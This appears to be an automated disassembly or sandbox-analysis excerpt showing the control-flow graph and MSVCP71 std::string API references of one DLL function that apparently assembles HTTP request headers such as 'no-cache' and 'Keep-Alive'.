                                                                                                                                              control_flow_graph 0 100a7a70-100a7adf call 100d1419 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z 3 100a7b18-100a7b53 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ ??$?9DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z 0->3 4 100a7ae1-100a7b13 call 10013c80 call 100132a0 0->4 6 100a7b59-100a7b84 ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z ??$?9DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z 3->6 7 100a7ccd-100a7dd4 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z call 100013d0 call 100d0de1 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 2 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z * 2 call 10078af0 call 100d0f27 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 2 3->7 4->3 9 100a7ba3-100a7c3f call 10028a10 ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z call 10028a10 ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z 6->9 10 100a7b86-100a7b9d ??$?9DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z 6->10 33 100a7de9-100a7eb8 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z * 2 call 10078af0 call 100d0f27 call 10078f50 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z * 2 call 10078af0 call 100d0f27 call 10078f50 7->33 34 100a7dd6-100a7de3 7->34 12 100a7c45-100a7c4e 9->12 10->9 10->12 15 100a7c59 12->15 16 100a7c50-100a7c57 12->16 21 100a7c5a-100a7c74 ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z call 100295f0 15->21 16->21 21->7 30 100a7c76-100a7cc7 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z call 10010060 ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 21->30 30->7 39 100a7ebd-100a7ec5 33->39 34->33 34->39 41 100a7f1f-100a7f63 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z * 2 call 10078af0 39->41 42 100a7ec7-100a7ecf 39->42 51 100a7f6b-100a802b call 100d0f27 call 10078f50 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z call 10078af0 call 100d0f27 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 2 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 41->51 42->41 44 100a7ed1-100a7f1d ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z * 2 call 10078af0 42->44 44->51 65 100a8068-100a8070 51->65 66 100a802d 51->66 68 100a8370 65->68 69 100a8076-100a807e 65->69 67 100a8030-100a8039 66->67 70 100a803b-100a8047 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z 67->70 71 100a804d-100a8066 ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z 67->71 74 100a8376-100a8414 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z call 10078af0 call 100d0f27 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 2 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 68->74 72 100a8112-100a814d ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z ??$?9DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z 69->72 73 100a8084-100a80a6 69->73 70->71 71->65 71->67 75 100a814f-100a8158 72->75 76 100a8186-100a81a9 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 72->76 73->72 77 100a80a8-100a80b4 73->77 98 100a841f 74->98 99 100a8416-100a841d 74->99 79 100a815a-100a8166 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z 75->79 80 100a816c-100a8181 ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z 75->80 81 100a81ab-100a81be ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z 76->81 82 100a81c3-100a81e4 call 10029600 call 100a4180 76->82 77->72 83 100a80b6-100a80bc 77->83 79->80 85 100a82a0-100a82d5 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z ??$?9DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z 80->85 86 100a8243-100a8257 ??$?9DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z 81->86 108 100a81e9-100a823c ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 2 ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z 82->108 88 100a80c0-100a80cd ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z 83->88 90 100a82d7-100a833f ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z call 10078af0 call 100d0f27 call 10078f50 85->90 91 100a8344-100a836e ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 2 85->91 93 100a828b-100a829a ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 86->93 94 100a8259-100a8262 86->94 95 100a80fa-100a8110 88->95 96 100a80cf-100a80d8 88->96 90->91 91->74 93->85 102 100a8276-100a8285 ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z 94->102 103 100a8264-100a8270 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z 94->103 95->72 95->88 104 100a80da-100a80e6 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z 96->104 105 100a80ec-100a80f4 ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z 96->105 106 100a8420-100a8440 ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z call 100295f0 98->106 99->106 102->93 103->102 104->105 105->95 113 100a84e0-100a8573 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z call 10078af0 call 100d0f27 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 2 ??$?9DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z 106->113 114 100a8446-100a84da call 10010060 call 10001482 call 100013d0 ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 3 106->114 108->86 124 100a8579-100a858c ??$?9DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z 113->124 125 100a86be-100a86d1 ??$?9DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z 113->125 114->113 124->125 129 100a8592-100a86b8 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z call 10001482 call 100013d0 call 1000eaf0 ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 3 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z call 10078af0 call 100d0f27 call 10078f50 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 124->129 127 100a8816-100a8825 125->127 128 100a86d7-100a8810 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z call 10001482 call 100013d0 call 1000eaf0 ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 3 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z call 10078af0 call 100d0f27 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 3 125->128 133 100a882b-100a8830 127->133 134 100a8a9f-100a8ab3 127->134 128->127 129->125 133->134 137 100a8836-100a8853 ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z 133->137 138 100a8ab9-100a8ac1 134->138 143 100a8869-100a8875 137->143 144 100a8855-100a885d 137->144 139 100a8b5d-100a8b64 138->139 140 100a8ac7-100a8aca 138->140 146 100a8d95-100a8e41 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ call 100a5290 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z call 10078af0 call 100d0f27 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 2 139->146 151 100a8b6a-100a8b72 139->151 145 100a8ad0-100a8b58 call 100281c0 call 10029600 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z call 10078af0 call 100d0f27 call 10078f50 140->145 140->146 147 100a8898-100a88fd ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z call 1000f180 ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 143->147 148 100a8877-100a8880 143->148 144->143 152 100a885f 144->152 246 100a8d88-100a8d90 call 10023953 145->246 208 100a8e47-100a8f03 call 1007dca0 call 100d1059 call 100d138e call 1007b730 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ call 10013c80 call 100132a0 146->208 209 100a8f54-100a8f81 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ call 100a5370 146->209 172 100a89de-100a89ea ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z 147->172 173 100a8903-100a891d 147->173 148->147 154 100a8882-100a888a 148->154 151->146 159 100a8b78-100a8b9c RtlEnterCriticalSection RtlLeaveCriticalSection 151->159 152->143 161 100a8a72-100a8a9d 154->161 162 100a8890-100a8892 154->162 159->146 167 100a8ba2-100a8bc1 ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z 159->167 161->138 162->147 162->161 168 100a8cfa-100a8d81 call 100281c0 call 10029600 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z call 10078af0 call 100d0f27 call 10078f50 167->168 169 100a8bc7-100a8be0 ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z 167->169 168->246 169->168 176 100a8be6-100a8bee 169->176 178 100a89f0-100a8a6c ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z call 10078af0 call 100d0f27 call 10078f50 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 172->178 181 100a8929-100a8937 173->181 182 100a891f-100a8921 173->182 185 100a8c84-100a8cf5 call 10029600 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z call 10078af0 call 100d0f27 call 10078f50 176->185 186 100a8bf4-100a8c7f call 100281c0 call 10029600 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z call 10078af0 call 100d0f27 call 10078f50 176->186 178->161 193 100a8939-100a893e 181->193 182->181 191 100a8923-100a8927 182->191 185->146 186->246 191->193 193->172 201 100a8944-100a8952 193->201 210 100a895e-100a896c 201->210 211 100a8954-100a8956 201->211 283 100a8f2b-100a8f4f ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ call 1007bd30 208->283 284 100a8f05-100a8f14 208->284 232 100a9007-100a908b ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ call 100d1095 call 100131c0 209->232 233 100a8f87-100a9001 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z call 10078af0 call 100d0f27 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 2 209->233 215 100a896e-100a89dc call 1000f180 call 10001429 ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 2 210->215 211->210 222 100a8958-100a895c 211->222 215->178 222->215 273 100a908d-100a90bc ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z call 1021b190 _CxxThrowException 232->273 274 100a90c1-100a90d0 232->274 233->232 246->146 273->274 277 100a90d9-100a91f8 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 7 call 100d13ca call 10025980 274->277 278 100a90d2 274->278 278->277 283->209 285 100a8f1d-100a8f26 call 100d0dd9 284->285 286 100a8f16 284->286 285->283 286->285
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 100D1419: __EH_prolog.LIBCMT ref: 100D141E
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 100A7AC9
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A7B2E
                                                                                                                                              • ??$?9DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71(?,102768F0), ref: 100A7B48
                                                                                                                                              • ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?,?,00000000), ref: 100A7B67
                                                                                                                                              • ??$?9DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71(?,102768F0,?,00000000), ref: 100A7B79
                                                                                                                                              • ??$?9DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71(?,102768F0), ref: 100A7B92
                                                                                                                                              • ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71 ref: 100A7BC4
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A7BD9
                                                                                                                                              • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(1027B998), ref: 100A7BEB
                                                                                                                                              • ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71 ref: 100A7C18
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A7C2D
                                                                                                                                              • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(1027B994), ref: 100A7C3F
                                                                                                                                              • ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 100A7C61
                                                                                                                                              • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(1027B998), ref: 100A7C82
                                                                                                                                              • ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71 ref: 100A7CB2
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A7CC7
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A7D34
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A7D49
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(*/*,?,?,?,?,?,00000000,?,?,?,?,?,00000000), ref: 100A7D5D
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 100A7D7C
                                                                                                                                                • Part of subcall function 10078AF0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,?,?,?,?,?,?,10247E6B,000000FF), ref: 10078B27
                                                                                                                                                • Part of subcall function 10078AF0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,?,?,?,?,?,?,?,10247E6B,000000FF), ref: 10078B3A
                                                                                                                                                • Part of subcall function 10078AF0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,?,?,?,10247E6B,000000FF), ref: 10078B49
                                                                                                                                                • Part of subcall function 10078AF0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,?,?,?,10247E6B,000000FF), ref: 10078B5B
                                                                                                                                                • Part of subcall function 100D0F27: __EH_prolog.LIBCMT ref: 100D0F2C
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(00000000), ref: 100A7DB4
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A7DC6
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(no-cache), ref: 100A7DFA
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 100A7E16
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(no-cache), ref: 100A7E64
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 100A7E80
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(close), ref: 100A7EE2
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 100A7EFE
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(Keep-Alive), ref: 100A7F30
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 100A7F4C
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 100A7F9C
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 100A7FB8
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(00000000), ref: 100A7FF0
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A8002
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A8015
                                                                                                                                              • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(10281A44), ref: 100A8047
                                                                                                                                              • ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 100A8055
                                                                                                                                              • ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71(?,102768F0), ref: 100A80C6
                                                                                                                                              • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(10281A44), ref: 100A80E6
                                                                                                                                              • ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 100A80F4
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 100A8125
                                                                                                                                              • ??$?9DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71(?,102768F0), ref: 100A8146
                                                                                                                                              • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(10281A44), ref: 100A8166
                                                                                                                                              • ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 100A817B
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A818D
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 100A81B8
                                                                                                                                                • Part of subcall function 100D0F27: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,?,?,00000007), ref: 100D0F67
                                                                                                                                                • Part of subcall function 100D0F27: ?rend@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV?$reverse_iterator@Vconst_iterator@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@XZ.MSVCP71(?,?,00000007), ref: 100D0F77
                                                                                                                                                • Part of subcall function 100D0F27: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AVconst_iterator@12@XZ.MSVCP71(?,?,00000007), ref: 100D0F86
                                                                                                                                                • Part of subcall function 100D0F27: ?rend@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV?$reverse_iterator@Vconst_iterator@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@XZ.MSVCP71(?,?,00000007), ref: 100D0F96
                                                                                                                                                • Part of subcall function 100D0F27: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,00000007), ref: 100D1038
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000,?), ref: 100A81F9
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A820A
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A821C
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 100A8236
                                                                                                                                              • ??$?9DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71(?,102768F0), ref: 100A8250
                                                                                                                                              • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(10281A44), ref: 100A8270
                                                                                                                                              • ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 100A8285
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A829A
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 100A82B3
                                                                                                                                              • ??$?9DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71(?,102768F0), ref: 100A82CE
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 100A82EB
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 100A8307
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(00000000), ref: 100A8353
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A8368
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 100A838A
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 100A83A6
